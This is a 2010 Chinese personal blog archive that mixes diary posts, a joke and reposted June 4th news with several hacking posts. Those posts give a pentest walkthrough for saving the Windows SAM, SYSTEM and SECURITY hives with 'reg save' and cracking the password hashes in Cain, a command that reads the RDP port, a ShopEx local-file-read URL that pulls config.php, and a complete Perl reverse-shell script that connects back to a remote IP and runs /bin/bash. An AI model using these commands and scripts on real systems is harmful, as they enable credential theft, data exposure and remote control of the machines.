2010年6月19日星期六

2010年6月16日星期三

@@@@

     社会工程说白的了就是骗,只要你的骗术够高明,什么网站都不在话下。社工是不是要胸怀城府呢,不知道,可我不想有很深的城府,那很累,可是为了梦想又有什么办法呢。梦想很美好,现实很骨感,你的很美好,我的很凄惨。说远点,真的很不适应,大概刚刚上班,而且这么有规律,多少有点力不从心。好渴,好难过,好苦,还热,好。。。。。

2010年6月10日星期四

神经病症状已经显现了

煮了半天饭,最后发现竟然没有放米。天啊,已经显现神经病症状了。去精神病医院预定个床位是个明智的选择。

2010年6月9日星期三

有才

一头母牛正在牧场里悠闲地吃草,忽然一头公牛从远处狂奔而来说:快跑,砖家来了。母牛说:砖家来了,关我什么事?公牛着急的说:关键是砖家最喜欢吹牛B 了。母牛听了也狂奔起来,边跑边问公牛说:砖家喜欢吹牛B,你跑什么呢?公牛无奈的说:这挨千刀的小子不仅喜欢吹牛B,更喜欢扯D...

2010年6月5日星期六

渗透中另一种抓系统密码HASH 的技巧

作者:mickey@pentest.cc

现在登录目标3389 后,我看好多人都已经习惯抓密码HASH 然后回来彩虹表破解出明文了,或者传个
winloginhack 来记录3389 的登录密码。在我最近的几次渗透中,发现pwdump,fgdump 这类工具现在已经
不免杀了,而且这类工具都是要注入到lsass.exe 进程的,遇到macfee 这类的杀毒软件,默认是绕不过去的。
Winlogin 网上放出来的,经过我的测试,对WIN2008 是没有效果的。今天浏览BLOG,看到老外提到另一
种抓系统密码hash 的技巧,经过实践,发现可行,分享给大家。
首先使用 administrator 权限登录,然后使用reg 来保存注册表中HKLM 下的SECURITY,SAM,SYSTEM,注
意这里必须使 用reg 的save 选项,export 选项是不行的,
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
如图1:

然后把sam.hive,system.hive,security.hive 下载回本地,打开CAIN,在"Decoders"标签下,点"LSA Secrets",
点"+"来导入system.hive 和security.hive.
如图2

这里一般就能看到管理员的明文密码了, 如图3,当然这里的密码,有时候也是历史密码。如果尝试登录
不对,可以来尝试爆破lm/ntlm hash.

要破解LM/NTLM hash,首先点"cracker"标签下的"LM&NTLM hashes",然后点"+",导入sam.hive,注意由于
现在的win2000 以后都默认使用了syskey,所以还要导入system.hive 中的syskey 的值,然后就可以彩虹表
破解了。如图4.如图5

后话:
这个方法不是对所有WINDOWS 发行版本都通用的,比如对win 2000 sp4,win xp sp2 就不行,对
win2003,2008 是管用的。具体工作列表如下:
Windows 2000 SP4 (admin) = access denied
Windows XP SP2 (admin) = access denied
Windows XP SP3 (admin) = access denied
Windows 2003 R2 SP2 (admin) = works
Windows Vista SP2 (UAC/admin) = works
Windows 2008 SP1 (admin) = works
Windows 7 (UAC/admin) = works

cmd下读取终端端口

regedit /e c:\\tsport.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

然后 type c:\\tsport.reg | find "PortNumber"

2010年6月4日星期五

ShopEx网上商店系统/shopadmin/index.php 本地文件读取漏洞

SSV ID:19737
SEBUG-Appdir:ShopEx
发布时间:2010-06-03
影响版本:
Shopex V4.8.5
漏洞描述:
ShopEx网上商店平台软件系统又称网店管理系统、网店程序、网上购物系统、在线购物系统。

index.php在对参数的处理过程中存在本地文件读取漏洞
测试方法:
[www.sebug.net]
本站提 供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://ssvdb.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

SEBUG安全建议:
厂商补丁:

ShopEx.cn
------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.ShopEx.cn
// sebug.net [2010-06-04]

吾尔开希日本中使馆寻“自首”遭扣留

【大纪元6月4日讯】(大纪元记者洪峰东京报导)今天是八九六四的第21年,21年前中共开枪血腥镇压学生,被中共通缉的21名学生领袖之一的吾尔开希, 近日特地赶来日本,今天在日本大使馆以寻求"自首"方式,要求回去中国与中共对话,在得不到任何反应的情况下,吾尔开希欲闯入大使馆,即时被日本警视厅警 察抓捕,送往东京麻布警察署遭扣留。

居住在台湾已经13年的吾尔开希表示,由于台湾没有中国大使馆,他去年曾经到过澳门联络办公室,寻求引渡我回 国,当遭到拒绝。不得已情况下近日特地赶来日本,通过日本警视厅寻求与驻东京日本大使馆对话,并表示21年来要求对话始终贯彻到底。

吾尔开 希说,"对话是以一种自己的意志,深刻的自己的意志,他是民主最核心的价值。"21岁就不得不流亡海外的吾尔开希,人生的一半是在流亡中度过。在21年后 今天的吾尔开希表示,"我依然要求以对话的形式与21年前的天安门广场一样,这种和平的方式,哪怕是以自首的方式,哪怕通过答辩的方式,来贯彻我自始自终 的对话原则。"



站在驻东京日本大使馆前栅栏的外侧,他指着栅栏说,"警察告诉我,这个栅栏 的内侧是中国管辖,这个栅栏的外侧是日本国土,我现在站在这个边界线上,这个简单的一条线,隔绝着我与祖国,回到祖国是天赋的权利,分隔21年还要用自首 的方式,这个有形无形的栅栏,挡着我,因为我是中国政府通缉的一号人物,我寻求回家的努力不会停止!我敢投案,你敢不敢抓我!?"

吾尔开希 谈到他21年来见不到父母和家人,"中国政府的株连九族的手段造成的人伦惨剧,我21年没有见到我的父母,兄弟姐妹。"

他逼于无奈的表示, "即使引渡我回中国,我被逮捕,至少以探监的形式,我可以见到我的父母,我可以与中国政府对话,哪怕以起诉书,答辩状的形式,因此,今天我以自首的方式来 到中国驻日大使馆。"

大约在下午两点半,寻求"自首"的吾尔开希在得不到大使馆的任何回应后,越过大使馆栅栏,欲闯入大使馆,即被日本警视 厅警察抓捕,送往东京麻布警察署遭扣留。

与此同时,今天六四正日,包括日本民主阵线等多个民运团体均发出抗议之声,抗议中共血腥镇压学生等 活动,要求"平反六四血债血还。"

深圳卫视播出“平反六四”内容遭当局查处

“六四”前夕,深圳卫视《正午30分》栏目因播出“六四要平反”的画面,以及采访要求给“六四”平反的人士,遭到 中共当局的处分。据悉,“六四”事件21周年敏感期间,中共当局更加严格禁止各媒体对“六四”问题的报导。这一做法遭到海外媒体的指责。

据法广报导,深圳卫视所属的深圳广播电影电视集团总裁王茂亮、总编辑陈君聪以及深圳卫视的多名负责人已经停职接受调查。

据报导,20多年来,深圳卫视是大陆唯一公开要求为“六四”平反的媒体,再加上深圳卫视近来频频报导中共认为的“敏感”话 题。例如播出国家副主席习近平批评西方国家对中国事务“指手画脚”的内容、在玉树地震报导时称受灾的“藏民”为“ 葬民”,以及节目画面中拍到“法轮大法好”、“台湾中国,一边一国”等。

相关官员声 称,对深圳广电集团责任人处理是为了控制事态的影响,并警示其它媒体不准报导有关六四的内容。

法新社在报导指出,中共当局在改善人权自由方面装聋作哑。


图: 2010年6月3日“六四事件”21周年纪念前夕,深圳卫视《正午30分》栏目因为播出“六四要平反”的画面和采访要求平反“六四事件”的人士,遭到处 分。

六‧四

2010年6月3日星期四

CCAV

人民日報滿嘴放炮,CCAV沒臉沒皮。

飘扬的青天白日满地红

山川壮丽 物产丰隆 炎黄世胄 东亚称雄
毋自暴自弃 毋故步自封 光我民族 促进大同
创业维艰 缅怀诸先烈 守成不易 莫徒务近功
同心同德 贯彻始终 青天白日满地红
同心同德 贯彻始终 青天白日满地红

Linux下提權反彈腳本

linux下提權反彈腳本!如下
#!/usr/bin/perl -w
#

use strict;
use Socket;
use IO::Handle;

if($#ARGV+1 != 2){
print "$#ARGV $0 Remote_IP Remote_Port \n";
exit 1;
}

my $remote_ip = $ARGV[0];
my $remote_port = $ARGV[1];

my $proto = getprotobyname("tcp");
my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip));

my $shell = '/bin/bash -i';

socket(SOCK, AF_INET, SOCK_STREAM, $proto);

STDOUT->autoflush(1);
SOCK->autoflush(1);

connect(SOCK,$pack_addr) or die "can not connect:$!";

open STDIN, "<&SOCK";
open STDOUT, ">&SOCK";
open STDERR, ">&SOCK";

print "Enjoy the shell.\n";

system($shell);
close SOCK;

exit 0;
把以上代碼保存為*.pl